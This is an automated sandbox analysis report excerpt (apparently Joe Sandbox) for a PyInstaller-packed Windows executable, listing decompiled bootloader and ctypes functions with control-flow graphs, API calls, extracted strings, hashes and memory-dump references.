                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                            • Opcode ID: 35e2d5c93137b8b0a027e840dca31b369a239d429a1659609ffe838318533280
                                                                                                                                                                                                            • Instruction ID: ac9bf935b0cae6e4f66910006810c6ae978cf18dca6ee422b6086e60a12a7dfd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35e2d5c93137b8b0a027e840dca31b369a239d429a1659609ffe838318533280
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A751A772A0EA42AAE710FF21D5811B9F760FB48745FC64135EA4D976B5DF3CE5008760
                                                                                                                                                                                                            Function 00007FF8A7EA8C60 Relevance: 52.7, APIs: 20, Strings: 10, Instructions: 180libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 7ff8a7ea8c60-7ff8a7ea8cac 1 7ff8a7ea8cb2-7ff8a7ea8cbd 0->1 2 7ff8a7ea8f0b-7ff8a7ea8f22 _PyArg_ParseTuple_SizeT 0->2 1->2 5 7ff8a7ea8cc3-7ff8a7ea8cd1 1->5 3 7ff8a7ea8f24-7ff8a7ea8f2f 2->3 4 7ff8a7ea8f49 2->4 9 7ff8a7ea8f32-7ff8a7ea8f43 PyErr_SetString 3->9 8 7ff8a7ea8f4b-7ff8a7ea8f70 call 7ff8a7ebadc0 4->8 6 7ff8a7ea8cd7-7ff8a7ea8ce1 5->6 7 7ff8a7ea8e6f-7ff8a7ea8e89 _PyArg_ParseTuple_SizeT 5->7 6->7 10 7ff8a7ea8ce7-7ff8a7ea8cf1 6->10 7->4 12 7ff8a7ea8e8f-7ff8a7ea8e9f 7->12 9->4 10->7 13 7ff8a7ea8cf7-7ff8a7ea8d01 10->13 15 7ff8a7ea8ec1-7ff8a7ea8ec8 12->15 16 7ff8a7ea8ea1-7ff8a7ea8ebc PyErr_Format 12->16 13->7 17 7ff8a7ea8d07-7ff8a7ea8d11 13->17 18 7ff8a7ea8ee3-7ff8a7ea8f03 PyUnicode_FromFormat PyUnicode_AsUTF8 15->18 19 7ff8a7ea8eca-7ff8a7ea8ee1 PyErr_Format 15->19 16->4 17->7 20 7ff8a7ea8d17-7ff8a7ea8d31 _PyArg_ParseTuple_SizeT 17->20 21 7ff8a7ea8f06-7ff8a7ea8f09 18->21 19->4 22 7ff8a7ea8d33-7ff8a7ea8d42 PyUnicode_AsUTF8 20->22 23 7ff8a7ea8db0-7ff8a7ea8ddf PyErr_Clear _PyArg_ParseTuple_SizeT 20->23 21->8 22->4 24 7ff8a7ea8d48-7ff8a7ea8d65 PyUnicode_GetSize 22->24 23->4 25 7ff8a7ea8de5-7ff8a7ea8df8 PyUnicode_AsUTF8 23->25 26 7ff8a7ea8d71-7ff8a7ea8d98 call 7ff8a7ebaf70 PyUnicode_AsWideChar 24->26 27 7ff8a7ea8d67 24->27 28 7ff8a7ea8e05-7ff8a7ea8e08 25->28 29 7ff8a7ea8dfa-7ff8a7ea8e00 PyMem_Free 25->29 26->4 35 7ff8a7ea8d9e-7ff8a7ea8dae LoadLibraryExW 26->35 27->26 28->9 30 7ff8a7ea8e0e-7ff8a7ea8e1b LoadLibraryA PyMem_Free 28->30 29->4 32 7ff8a7ea8e21-7ff8a7ea8e24 30->32 32->21 34 7ff8a7ea8e2a-7ff8a7ea8e32 GetLastError 32->34 36 7ff8a7ea8e34-7ff8a7ea8e48 call 7ff8a7ea11a0 34->36 37 7ff8a7ea8e4d-7ff8a7ea8e6a PyErr_Format 34->37 35->32 36->37 37->4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285448152.00007FF8A7EA0000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285487043.00007FF8A7EBC000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285506628.00007FF8A7EC9000.00000004.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285524281.00007FF8A7ECF000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Unicode_$Err_Size$Arg_FormatParseTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastStringWide
                                                                                                                                                                                                            • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                                                                                                                                                                            • API String ID: 2215032769-880521189
                                                                                                                                                                                                            • Opcode ID: 764e71f7d5ed0d7f936479e041b02300a4ec3b1ed7d0c21ea5e238435aa1c0ea
                                                                                                                                                                                                            • Instruction ID: 7f7e6a1acc76f2ecedd6a93da04c0afe6dc48d87f4948dc9835e5143a3c8b7a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 764e71f7d5ed0d7f936479e041b02300a4ec3b1ed7d0c21ea5e238435aa1c0ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72911636B0AA86E5EB11CF61E8401BC2761FF94FD5B448532EA0D476A4EF3CE569E340
                                                                                                                                                                                                            Function 00007FF7ACE817B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2153230061-4158440160
                                                                                                                                                                                                            • Opcode ID: 076990a9cdb365f37a486f0801e3f63eb4f8c25b8143e7edd0e93668b4333e5c
                                                                                                                                                                                                            • Instruction ID: 2bf2c02124c62f8ea5b6fad07ba3e8c1b5f6a01171734c86714095ebadadf1dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 076990a9cdb365f37a486f0801e3f63eb4f8c25b8143e7edd0e93668b4333e5c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53519272A0E682A6EB54EF24D55017CB3A0FF48B49B969135D90DA73B9DF3CE440CB60
                                                                                                                                                                                                            Function 00007FF7ACE812B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                            • Opcode ID: ccd96fa709924df0f3163e071325977cdadda225d23be4b42b5a526fd017ca04
                                                                                                                                                                                                            • Instruction ID: 593627fda9dab8f558f792bd231727e4e0d85f49fb528d0963f37c8082c8414b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd96fa709924df0f3163e071325977cdadda225d23be4b42b5a526fd017ca04
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A418131A0E7C2A6EA24FB11E5006AAF3A0EF44795FC64431DE4D67B65EE3CE442C760
                                                                                                                                                                                                            Function 00007FF7ACE81000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 494 7ff7ace81000-7ff7ace83666 call 7ff7ace8efb0 call 7ff7ace8efa8 call 7ff7ace87570 call 7ff7ace8efa8 call 7ff7ace8ad00 call 7ff7ace941a0 call 7ff7ace94e44 call 7ff7ace81af0 512 7ff7ace8366c-7ff7ace8367b call 7ff7ace83b80 494->512 513 7ff7ace8377a 494->513 512->513 518 7ff7ace83681-7ff7ace83694 call 7ff7ace83a50 512->518 515 7ff7ace8377f-7ff7ace8379f call 7ff7ace8acd0 513->515 518->513 522 7ff7ace8369a-7ff7ace836ad call 7ff7ace83b00 518->522 522->513 525 7ff7ace836b3-7ff7ace836da call 7ff7ace86970 522->525 528 7ff7ace8371c-7ff7ace83744 call 7ff7ace86f10 call 7ff7ace819d0 525->528 529 7ff7ace836dc-7ff7ace836eb call 7ff7ace86970 525->529 540 7ff7ace8382d-7ff7ace8383e 528->540 541 7ff7ace8374a-7ff7ace83760 call 7ff7ace819d0 528->541 529->528 535 7ff7ace836ed-7ff7ace836f3 529->535 537 7ff7ace836f5-7ff7ace836fd 535->537 538 7ff7ace836ff-7ff7ace83719 call 7ff7ace93fcc call 7ff7ace86f10 535->538 537->538 538->528 543 7ff7ace83853-7ff7ace8386b call 7ff7ace879a0 540->543 544 7ff7ace83840-7ff7ace8384a call 7ff7ace83260 540->544 553 7ff7ace83762-7ff7ace83775 call 7ff7ace82770 541->553 554 7ff7ace837a0-7ff7ace837a3 541->554 558 7ff7ace8387e-7ff7ace83885 SetDllDirectoryW 543->558 559 7ff7ace8386d-7ff7ace83879 call 7ff7ace82770 543->559 556 7ff7ace8384c 544->556 557 7ff7ace8388b-7ff7ace83898 call 7ff7ace85e20 544->557 553->513 554->540 555 7ff7ace837a9-7ff7ace837c0 call 7ff7ace83c90 554->555 569 7ff7ace837c7-7ff7ace837f3 call 7ff7ace87170 555->569 570 7ff7ace837c2-7ff7ace837c5 555->570 556->543 567 7ff7ace8389a-7ff7ace838aa call 7ff7ace85ac0 557->567 568 7ff7ace838e6-7ff7ace838eb call 7ff7ace85da0 557->568 558->557 559->513 567->568 582 7ff7ace838ac-7ff7ace838bb call 7ff7ace85620 567->582 575 7ff7ace838f0-7ff7ace838f3 568->575 583 7ff7ace8381d-7ff7ace8382b 569->583 584 7ff7ace837f5-7ff7ace837fd call 7ff7ace8f1dc 569->584 573 7ff7ace83802-7ff7ace83818 call 7ff7ace82770 570->573 573->513 580 7ff7ace838f9-7ff7ace83906 575->580 581 7ff7ace839a6-7ff7ace839ae call 7ff7ace830f0 575->581 585 7ff7ace83910-7ff7ace8391a 580->585 592 7ff7ace839b3-7ff7ace839b5 581->592 596 7ff7ace838bd-7ff7ace838c9 call 7ff7ace855b0 582->596 597 7ff7ace838dc-7ff7ace838e1 call 7ff7ace85870 582->597 583->544 584->573 589 7ff7ace8391c-7ff7ace83921 585->589 590 7ff7ace83923-7ff7ace83925 585->590 589->585 589->590 594 7ff7ace83927-7ff7ace8394a call 7ff7ace81b30 590->594 595 7ff7ace83971-7ff7ace8397c call 7ff7ace83250 call 7ff7ace83090 590->595 592->513 598 7ff7ace839bb-7ff7ace839f2 call 7ff7ace86ea0 call 7ff7ace86970 call 7ff7ace853c0 592->598 594->513 608 7ff7ace83950-7ff7ace8395b 594->608 615 7ff7ace83981-7ff7ace839a1 call 7ff7ace83240 call 7ff7ace85870 call 7ff7ace85da0 595->615 596->597 609 7ff7ace838cb-7ff7ace838da call 7ff7ace85c70 596->609 597->568 598->513 621 7ff7ace839f8-7ff7ace83a2d call 7ff7ace83250 call 7ff7ace86f50 call 7ff7ace85870 call 7ff7ace85da0 598->621 612 7ff7ace83960-7ff7ace8396f 608->612 609->575 612->595 612->612 615->515 634 7ff7ace83a37-7ff7ace83a41 call 7ff7ace81ab0 621->634 635 7ff7ace83a2f-7ff7ace83a32 call 7ff7ace86c10 621->635 634->515 635->634
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE83B80: GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7ACE83885
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                            • API String ID: 2344891160-3602715111
                                                                                                                                                                                                            • Opcode ID: 2ef5a63f544a7674e0c756e3ee58beae799b4e42eae2fb0ceef727c84f68c8fa
                                                                                                                                                                                                            • Instruction ID: 6459782b4f997882763a611c0427ed71f68e65b52eb2cd9f457faef7723bcbdc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ef5a63f544a7674e0c756e3ee58beae799b4e42eae2fb0ceef727c84f68c8fa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B1B331A1E6C365FE60BB25DA512BEB290BF40786FC64031E94D676F6EE2CE504C760
                                                                                                                                                                                                            Function 00007FF7ACE81050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 639 7ff7ace81050-7ff7ace810ab call 7ff7ace898b0 642 7ff7ace810ad-7ff7ace810d2 call 7ff7ace82770 639->642 643 7ff7ace810d3-7ff7ace810eb call 7ff7ace93fe0 639->643 648 7ff7ace810ed-7ff7ace81104 call 7ff7ace824d0 643->648 649 7ff7ace81109-7ff7ace81119 call 7ff7ace93fe0 643->649 654 7ff7ace8126c-7ff7ace812a0 call 7ff7ace895a0 call 7ff7ace93fcc * 2 648->654 655 7ff7ace8111b-7ff7ace81132 call 7ff7ace824d0 649->655 656 7ff7ace81137-7ff7ace81147 649->656 655->654 657 7ff7ace81150-7ff7ace81175 call 7ff7ace8f52c 656->657 665 7ff7ace8125e 657->665 666 7ff7ace8117b-7ff7ace81185 call 7ff7ace8f2a0 657->666 668 7ff7ace81264 665->668 666->665 673 7ff7ace8118b-7ff7ace81197 666->673 668->654 674 7ff7ace811a0-7ff7ace811c8 call 7ff7ace87d20 673->674 677 7ff7ace811ca-7ff7ace811cd 674->677 678 7ff7ace81241-7ff7ace8125c call 7ff7ace82770 674->678 679 7ff7ace8123c 677->679 680 7ff7ace811cf-7ff7ace811d9 677->680 678->668 679->678 682 7ff7ace811db-7ff7ace811e8 call 7ff7ace8fc6c 680->682 683 7ff7ace81203-7ff7ace81206 680->683 690 7ff7ace811ed-7ff7ace811f0 682->690 685 7ff7ace81219-7ff7ace8121e 683->685 686 7ff7ace81208-7ff7ace81216 call 7ff7ace8baa0 683->686 685->674 689 7ff7ace81220-7ff7ace81223 685->689 686->685 692 7ff7ace81237-7ff7ace8123a 689->692 693 7ff7ace81225-7ff7ace81228 689->693 694 7ff7ace811fe-7ff7ace81201 690->694 695 7ff7ace811f2-7ff7ace811fc call 7ff7ace8f2a0 690->695 692->668 693->678 697 7ff7ace8122a-7ff7ace81232 693->697 694->678 695->685 695->694 697->657
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: 1.2.12$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-1282086711
                                                                                                                                                                                                            • Opcode ID: 0cf0d40fcd6668befe088b4bb6862fe5dbf3c5322c70cb13d3896b4c1b0e65d4
                                                                                                                                                                                                            • Instruction ID: 8b557977b753fb909f089ed40b161a4988453b1268fb2e32596d7bc0b018bedb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf0d40fcd6668befe088b4bb6862fe5dbf3c5322c70cb13d3896b4c1b0e65d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51E332A0E6C2A5EA60BB11E5403BAB2A0BB80795FC64135ED4DA37A5EF3CE445C750
                                                                                                                                                                                                            Function 00007FF7ACE9AE5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 699 7ff7ace9ae5c-7ff7ace9ae82 700 7ff7ace9ae84-7ff7ace9ae98 call 7ff7ace94354 call 7ff7ace94374 699->700 701 7ff7ace9ae9d-7ff7ace9aea1 699->701 719 7ff7ace9b28e 700->719 703 7ff7ace9b277-7ff7ace9b283 call 7ff7ace94354 call 7ff7ace94374 701->703 704 7ff7ace9aea7-7ff7ace9aeae 701->704 722 7ff7ace9b289 call 7ff7ace99ce0 703->722 704->703 705 7ff7ace9aeb4-7ff7ace9aee2 704->705 705->703 708 7ff7ace9aee8-7ff7ace9aeef 705->708 711 7ff7ace9aef1-7ff7ace9af03 call 7ff7ace94354 call 7ff7ace94374 708->711 712 7ff7ace9af08-7ff7ace9af0b 708->712 711->722 717 7ff7ace9af11-7ff7ace9af17 712->717 718 7ff7ace9b273-7ff7ace9b275 712->718 717->718 723 7ff7ace9af1d-7ff7ace9af20 717->723 720 7ff7ace9b291-7ff7ace9b2a8 718->720 719->720 722->719 723->711 726 7ff7ace9af22-7ff7ace9af47 723->726 728 7ff7ace9af7a-7ff7ace9af81 726->728 729 7ff7ace9af49-7ff7ace9af4b 726->729 730 7ff7ace9af83-7ff7ace9afab call 7ff7ace9c9fc call 7ff7ace99d48 * 2 728->730 731 7ff7ace9af56-7ff7ace9af6d call 7ff7ace94354 call 7ff7ace94374 call 7ff7ace99ce0 728->731 732 7ff7ace9af72-7ff7ace9af78 729->732 733 7ff7ace9af4d-7ff7ace9af54 729->733 764 7ff7ace9afc8-7ff7ace9aff3 call 7ff7ace9b684 730->764 765 7ff7ace9afad-7ff7ace9afc3 call 7ff7ace94374 call 7ff7ace94354 730->765 762 7ff7ace9b100 731->762 734 7ff7ace9aff8-7ff7ace9b00f 732->734 733->731 733->732 737 7ff7ace9b011-7ff7ace9b019 734->737 738 7ff7ace9b08a-7ff7ace9b094 call 7ff7acea296c 734->738 737->738 743 7ff7ace9b01b-7ff7ace9b01d 737->743 749 7ff7ace9b09a-7ff7ace9b0af 738->749 750 7ff7ace9b11e 738->750 743->738 747 7ff7ace9b01f-7ff7ace9b035 743->747 747->738 752 7ff7ace9b037-7ff7ace9b043 747->752 749->750 754 7ff7ace9b0b1-7ff7ace9b0c3 GetConsoleMode 749->754 758 7ff7ace9b123-7ff7ace9b143 ReadFile 750->758 752->738 756 7ff7ace9b045-7ff7ace9b047 752->756 754->750 761 7ff7ace9b0c5-7ff7ace9b0cd 754->761 756->738 763 7ff7ace9b049-7ff7ace9b061 756->763 759 7ff7ace9b149-7ff7ace9b151 758->759 760 7ff7ace9b23d-7ff7ace9b246 GetLastError 758->760 759->760 766 7ff7ace9b157 759->766 769 7ff7ace9b263-7ff7ace9b266 760->769 770 7ff7ace9b248-7ff7ace9b25e call 7ff7ace94374 call 7ff7ace94354 760->770 761->758 768 7ff7ace9b0cf-7ff7ace9b0f1 ReadConsoleW 761->768 771 7ff7ace9b103-7ff7ace9b10d call 7ff7ace99d48 762->771 763->738 772 7ff7ace9b063-7ff7ace9b06f 763->772 764->734 765->762 774 7ff7ace9b15e-7ff7ace9b173 766->774 776 7ff7ace9b112-7ff7ace9b11c 768->776 777 7ff7ace9b0f3 GetLastError 768->777 781 7ff7ace9b0f9-7ff7ace9b0fb call 7ff7ace942e8 769->781 782 7ff7ace9b26c-7ff7ace9b26e 769->782 770->762 771->720 772->738 780 7ff7ace9b071-7ff7ace9b073 772->780 774->771 785 7ff7ace9b175-7ff7ace9b180 774->785 776->774 777->781 780->738 789 7ff7ace9b075-7ff7ace9b085 780->789 781->762 782->771 791 7ff7ace9b182-7ff7ace9b19b call 7ff7ace9aa74 785->791 792 7ff7ace9b1a7-7ff7ace9b1af 785->792 789->738 799 7ff7ace9b1a0-7ff7ace9b1a2 791->799 795 7ff7ace9b1b1-7ff7ace9b1c3 792->795 796 7ff7ace9b22b-7ff7ace9b238 call 7ff7ace9a8b4 792->796 800 7ff7ace9b1c5 795->800 801 7ff7ace9b21e-7ff7ace9b226 795->801 796->799 799->771 803 7ff7ace9b1ca-7ff7ace9b1d1 800->803 801->771 804 7ff7ace9b1d3-7ff7ace9b1d7 803->804 805 7ff7ace9b20d-7ff7ace9b218 803->805 806 7ff7ace9b1f3 804->806 807 7ff7ace9b1d9-7ff7ace9b1e0 804->807 805->801 808 7ff7ace9b1f9-7ff7ace9b209 806->808 807->806 809 7ff7ace9b1e2-7ff7ace9b1e6 807->809 808->803 810 7ff7ace9b20b 808->810 809->806 811 7ff7ace9b1e8-7ff7ace9b1f1 809->811 810->801 811->808
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 52e28160fca86a7eeceb88bd81f6b9396e1938daf65dac55fe125d3a7a8202fa
                                                                                                                                                                                                            • Instruction ID: e6f249b708edd59c1bfea9a30a6da65c4e7b3ae8e64d566eafbd167c0372c02e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52e28160fca86a7eeceb88bd81f6b9396e1938daf65dac55fe125d3a7a8202fa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55C1F43290E686A1EA70AB1594442BDF7A0FF81BC0F970571FA4E237B1CE7CE8558761
                                                                                                                                                                                                            Function 00007FF7ACE9E80C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
